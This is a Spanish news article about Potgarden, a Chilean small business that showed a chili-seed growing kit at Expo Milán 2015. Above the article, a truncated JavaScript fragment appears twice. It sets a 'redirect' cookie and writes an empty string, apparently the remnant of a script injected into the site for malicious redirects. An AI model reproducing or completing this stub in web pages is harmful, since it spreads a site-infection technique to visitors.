=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " /> =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " />

Noticias

Potgarden: El “chile de Chile” que crece en Europa

27 Dic 2015

Compartir:

Fue uno de los productos más ingeniosos y populares de la oferta que mostró “El Amor de Chile” en Europa. Potgarden, la pyme creada el 2011 y que busca reingresar la huerta familiar en las casas y departamentos del mundo, estuvo presente en Expo Milán 2015 con un kit de siembra ají cacho de cabra y ají verde, que permitirá a los compradores poseer un trozo de nuestro territorio en sus terrazas.

Valeria Kunstmann, una de sus fundadoras, cuenta que “somos una Pyme nacidas de tres socias que empezamos como muchos, a través de un capital Semilla de Corfo. Nuestra idea viene de la necesidad creciente que tienen las familias nuevas de cultivar sus propias siembras en espacios pequeños, en forma fácil y básicamente el concepto todo en uno (tierra, macetero biodegradable, semilla)  y con  elementos biodegradables e innovadores”.

Kunstmann aclara que “aunque este concepto ya existe en Europa, fue una gran oportunidad y una ventana para nosotros mostrar un producto “Puro Chile” que puede estar en todas las casas y terrazas del mundo”, haciendo hincapié de que su mayor fortaleza es la doble connotación que da en el juego de palabras “chile de Chile”.

Para este 2016 cuentan con una amplia oferta de almácigos y semilleros que esperan “sembrar el interés de niños y grandes por vivir la experiencia  de sembrar y cultivar huertos urbanos”, destacando que propuesta es “en base a materiales sustentables, que se caracterizan y se diferencian por su alto nivel de innovación, calidad y diseño, satisfaciendo el interés por cultivar un estilo de vida natural y saludable en espacios reducidos”.

Partners

Media Partner